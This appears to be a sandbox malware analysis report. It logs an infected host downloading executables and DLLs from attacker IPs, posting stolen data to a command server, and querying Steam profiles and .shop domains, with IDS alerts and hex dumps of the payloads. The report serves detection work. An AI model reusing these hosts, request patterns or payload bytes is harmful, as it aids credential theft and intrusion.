00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:49:53 GMTContent-Type: application/octet-streamContent-Length: 73728Last-Modified: Thu, 26 Sep 2024 23:36:16 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5eff0-12000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 8f 99 ab c7 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 06 01 00 00 18 00 00 00 00 00 00 fe 23 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac 23 01 00 4f 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 04 01 00 00 20 00 00 00 06 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 08 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 23 01 00 00 00 00 00 48 00 00 00 02 00 05 00 00 fd 00 00 ac 26 00 00 03 00 02 00 06 00 00 06 0c 2d 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 23 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 08 02 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 b0 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 16 03 00 70 28 02 00 00 06 02 72 30 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 b0 03 00 70 28 02 00 00 06 28 11 00 00 06 72 e2 03 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 14 04 00 70 28 02 00 00 06 2a 72 e2 03 00 70 28 02 00 00 06 2a aa 72 a7 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 a7 06 00 70 28 02 00 00 06 28 58 00 00 0a 6f 59 00 00 0a 28 5a 00 00 0a 2a 62 02 3a 0b 00 00 00 72 5a 07 00 70 28 02 00 00 06 2a 02 6f 5b 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 23:49:54 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 104.21.77.130 104.21.77.130
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-PUBMATICUS AS-PUBMATICUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49715 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49716 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49717 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49713 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49712 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49714 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49711 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49719 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49721 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49718 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49720 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49722 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49723 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49724 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49725 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49726 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49731 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49727 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49729 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49733 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49730 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49728 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49735 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49738 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49741 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49734 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49745 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49758 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49759 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49762 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49756 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49761 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49757 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49760 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49763 -> 104.26.12.205:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49766 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.8:49767 -> 5.75.211.162:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCAEHDBAAECBFHJKFCFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HDBKJEGIEBFHCAAKKEBAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KFBGCAKFHCFHJKECFIIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6761Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAAUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBAKKKFBGDHJKFHJJJJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1081Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KECGDBFCBKFIDHIDHDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFHJJDHJEGHJKECBGCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 130993Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AKFCFBAAEHCFHJJKEHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFIEBAFCBAAAAKJKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fragnantbui.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: stogeneratmns.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: reinforcenh.shop
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
